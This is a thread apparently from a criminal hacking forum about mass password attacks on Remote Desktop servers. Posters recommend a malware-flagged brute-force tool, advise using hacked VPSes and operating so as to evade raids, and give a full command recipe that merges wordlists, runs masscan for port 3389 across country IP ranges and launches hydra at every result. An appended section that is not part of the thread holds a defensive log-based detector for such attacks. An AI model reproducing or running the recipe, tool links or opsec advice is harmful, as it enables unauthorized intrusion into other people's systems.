
Manual/Book RDP attack

Prokhorenco

In this:


What will be your best suggestion for the --rate <value>

As per your experience, what will be the best value?
It depends on your server. My VPS can only handle --rate 50000 but a dedicated server or better VPS will handle more.

More $$$ = More rate :)
 
were


Where do you get IPs? I tried Shodan but only false positives.
I got mine from Shodan and then used nuclei to remove false positives. I also just use masscan and nuclei. See my post here: https://xss.pro/threads/86465/post-613079
 
Hydra has limits on passwords and the list of IP addresses it can handle. Have you managed to increase these limits in any way? When attempting to make small password guesses, it starts brute-forcing and returns an error.
Is it possible to adjust it for proper functioning with a large number of IP addresses and a large list of usernames and passwords, as specified in the instructions? It's currently not working for me. Can a kind person help me?
 
Try NLBrute. It's designed for mass campaigns: https://anonfiles.com/b0w3jf29ze/NLBrute_zip
 
Prokhorenco I was about to download NLBrute from the anonfile link you provided but it's being flagged as malware for some reason.

Anyhow, I noticed that you have mentioned about using VPS while trying out these brute force attacks and I understand that using a vps adds on an extra layer of security but if one does not have any vps, only a mere vpn, how badly would it affect my opsec?

Plus I know the issue with most VPNs is that you do not get port forwarding, so no callbacks from your beacon to the C2 you are hosting, I know big issue, but currently I do not have access to a VPS and in order to afford one, I need to find something to sell/earn money from, so is there a way to gain persistent access if you do not have a VPS to host the C2 on while using a VPN or another way other than gaining persistence via a C2?
 
Prokhorenco I was about to download NLBrute from the anonfile link you provided but it's being flagged as malware for some reason.
That's because it technically is.
Anyhow, I noticed that you have mentioned about using VPS while trying out these brute force attacks and I understand that using a vps adds on an extra layer of security but if one does not have any vps, only a mere vpn, how badly would it affect my opsec?
I would recommend against hacking from your local network/machine/VPN in terms of using automated tooling. Mainly for opsec reasons but also because it's extremely limiting. Using a server we can run tools 24/7 and not need our computers turned on meaning we can turn off our machines to go out and live life and have the machine be encrypted and safe in case of raids. Servers also will have more bandwidth than residential connections and depending on what you buy might have more specs (CPU, RAM and storage) than you.
 
In that case, are there any alternatives for free VPS that you could potentially use?
Also what are some of the best practices for them? I know most professionals in this field use VPS to work but since I have never set one up, I have no idea. Let's say I buy/rent a Linux-based VPS, now do I do a fresh install of Kali or whatever distro I use as my main machine on it? Or do I just stash some automated tools on it to use and the rest I use it as a proxy from my local machine to do whatever it is that I want to do?

If you can give a detailed answer or refer to a post that tells you how to set up a VPS for such purposes, that will be great!
 
Just get a hacked VPS to start/learn with, there is a ton on this forum.
 
Got it, I will try and do that right away.

For opsec purposes, should one use a VPN to connect to the VPS or connect directly from own internet and clear connection logs on the way out?
 
A method for simple Remote Desktop (RDP) password attack.

Download passwords:
Bash:
git clone https://github.com/danielmiessler/SecLists.git

Output all usernames into one file:
Bash:
find SecLists/Usernames/ -type f -exec cat {} + > usernames.txt

Output all passwords into one file:
Bash:
find SecLists/Passwords/ -type f -exec cat {} + > passwords.txt

Scan for RDP:
Bash:
sudo masscan -Pn -sS -iL ranges.txt --rate 6000 -p3389 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > targets.txt

Password attack:
Bash:
hydra -L usernames.txt -P passwords.txt -M targets.txt -t 16 rdp -o results

ranges.txt: https://lite.ip2location.com/ip-address-ranges-by-country
block.txt: https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2
Since when does Hydra brute-force new versions of RDP? Before writing the article, did you even check whether it works or not?
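
From the defender's side, the scan-then-guess workflow quoted above shows up on the target as a burst of failed logons (Event ID 4625) from one source across many usernames, sometimes followed by a success (4624). The following is an added example, not part of the thread: the key=value log format, the sample events and the thresholds are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events (not real logs). 4625 = failed logon, 4624 = success.
# RDP logons appear as LogonType 3 (network, as with NLA) or 10 (RemoteInteractive).
SAMPLE_LOG = """\
2024-01-10T03:00:01 EventID=4625 LogonType=3 TargetUserName=admin IpAddress=203.0.113.7
2024-01-10T03:00:02 EventID=4625 LogonType=3 TargetUserName=administrator IpAddress=203.0.113.7
2024-01-10T03:00:03 EventID=4625 LogonType=3 TargetUserName=backup IpAddress=203.0.113.7
2024-01-10T03:00:04 EventID=4625 LogonType=3 TargetUserName=scanner IpAddress=203.0.113.7
2024-01-10T03:00:05 EventID=4625 LogonType=3 TargetUserName=test IpAddress=203.0.113.7
2024-01-10T03:00:09 EventID=4624 LogonType=3 TargetUserName=test IpAddress=203.0.113.7
2024-01-10T09:15:00 EventID=4625 LogonType=10 TargetUserName=alice IpAddress=198.51.100.20
2024-01-10T09:15:40 EventID=4624 LogonType=10 TargetUserName=alice IpAddress=198.51.100.20
2024-01-10T09:20:00 EventID=4625 LogonType=2 TargetUserName=bob IpAddress=-
"""
RDP_LOGON_TYPES = {"3", "10"}

def parse_line(line):
    """Split 'timestamp key=value ...' into (datetime, dict of fields)."""
    stamp, *pairs = line.split()
    return datetime.fromisoformat(stamp), dict(p.split("=", 1) for p in pairs)

def detect_bruteforce(log_text, window=timedelta(minutes=5), min_failures=5, min_users=3):
    """Return {source_ip: details} for sources whose failed remote logons
    inside one sliding window reach both thresholds."""
    recent = defaultdict(deque)   # ip -> (time, user) of failures still in the window
    alerts = {}
    for line in filter(None, map(str.strip, log_text.splitlines())):
        when, ev = parse_line(line)
        ip = ev.get("IpAddress", "-")
        if ev.get("LogonType") not in RDP_LOGON_TYPES or ip == "-":
            continue              # local/console logons are not part of this signal
        q = recent[ip]
        while q and when - q[0][0] > window:   # expire failures older than the window
            q.popleft()
        if ev["EventID"] == "4625":
            q.append((when, ev["TargetUserName"]))
            users = {u for _, u in q}
            if len(q) >= min_failures and len(users) >= min_users:
                hit = alerts.setdefault(ip, {"failures": 0, "users": set(), "success_after": None})
                hit["failures"] = max(hit["failures"], len(q))
                hit["users"] |= users
        elif ev["EventID"] == "4624" and ip in alerts and q:
            # Success from a flagged source while its failures are still in the
            # window: treat the account as compromised and reset its credentials.
            alerts[ip]["success_after"] = ev["TargetUserName"]
    return alerts
```

The single mistyped password from 198.51.100.20 stays below both thresholds, while 203.0.113.7 is flagged with `success_after` set to the account that was guessed.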
 

